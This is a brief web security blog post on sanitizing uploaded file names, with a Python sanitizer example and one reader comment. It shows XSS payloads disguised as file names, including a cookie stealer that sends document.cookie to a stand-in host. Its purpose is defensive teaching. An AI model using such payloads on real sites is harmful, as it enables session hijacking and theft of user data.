Last Updated: June 11, 2021 · nmalcolm

Web Security: File Names

One important thing to remember when developing web applications is that you can never trust any of your users, in any case. Humans are cruel; it's not unlikely someone will try to crawl their way into your server or database.

When developing attachment, file upload, or similar systems, always remember to sanitize the file name.

Of course, modern computer systems don't allow slashes in file names, so the following wouldn't work:

<body>hacked</body>.txt

Systems just don't like that. You cannot use slashes in file names. But a file with a specially crafted name can still be uploaded, and that name could be used to steal cookies, redirect users, or modify the current page to the attacker's liking.

Examples:

// Simple alert
<body onload=alert(Hacked)>.txt

// Cookie stealer
<body onload=location.href="http:"+String.fromCharCode(47)+String.fromCharCode(47)+"localhost"+String.fromCharCode(47)+"test.php?data="+escape(document.cookie)>.txt

// etc

ALWAYS sanitize the file name. Keep yourself and your users safe. :)
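One way to do this in Python, added here as an example (not code from the original post): the stored name is stripped of any directory part and reduced to an allow-listed character set, the resolved path is checked to stay inside the upload directory (the directory path used is a placeholder), and the original name is HTML-escaped separately whenever it is displayed, since the names above only fire when a raw name is echoed into a page.

```python
import html
import os
import re
import unicodedata

# Allow-list for stored names: letters, digits, dot, dash, underscore.
_UNSAFE_RUN = re.compile(r"[^A-Za-z0-9._-]+")
_MAX_LEN = 100

def sanitize_filename(user_supplied: str) -> str:
    """Derive a storage-safe name from an untrusted upload name.

    Drops any directory part (so "../../x" cannot leave the upload dir),
    normalizes Unicode look-alikes, replaces every run of characters outside
    the allow-list (< > " ' = ( ) spaces, controls) with "_", refuses names
    that collapse to nothing or to dots only, and bounds the length.
    """
    # Treat both separators as path separators regardless of host OS.
    name = user_supplied.replace("\\", "/").rsplit("/", 1)[-1]
    name = unicodedata.normalize("NFKC", name)
    name = _UNSAFE_RUN.sub("_", name)
    name = name.strip("._")             # no hidden dotfiles, no stray edges
    if not name:
        name = "upload"
    stem, ext = os.path.splitext(name)  # keep the extension, bound the stem
    ext = ext[:10]
    return (stem[: _MAX_LEN - len(ext)] or "upload") + ext

def filename_for_html(user_supplied: str) -> str:
    """Escape the original name for display in HTML, independent of storage.

    Even a sanitized name must be escaped on output; the payload names above
    rely on this step being missing.
    """
    return html.escape(user_supplied, quote=True)

def safe_upload_path(upload_dir: str, user_supplied: str) -> str:
    """Join the sanitized name onto upload_dir and confirm it stays inside."""
    base = os.path.realpath(upload_dir)
    target = os.path.realpath(os.path.join(base, sanitize_filename(user_supplied)))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("resolved path escapes the upload directory")
    return target

if __name__ == "__main__":
    # Constructed inputs: the post's payload name plus a traversal attempt.
    for raw in ['<body onload=alert(Hacked)>.txt', "../../etc/passwd", "..."]:
        print(repr(raw), "->", sanitize_filename(raw), "|", filename_for_html(raw))
```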

1 Response

I couldn't agree more with you; I wish I had mentioned this in my Pro Tip about sanitizing variables.

The only thing I can add is HOW:

a) htmlspecialchars()
b) strip_tags()
c) stripslashes() / addslashes()
d) mysql_real_escape_string()
e) htmlentities()

And to be honest, hundreds more methods of sanitizing data.

Awesome post.

over 1 year ago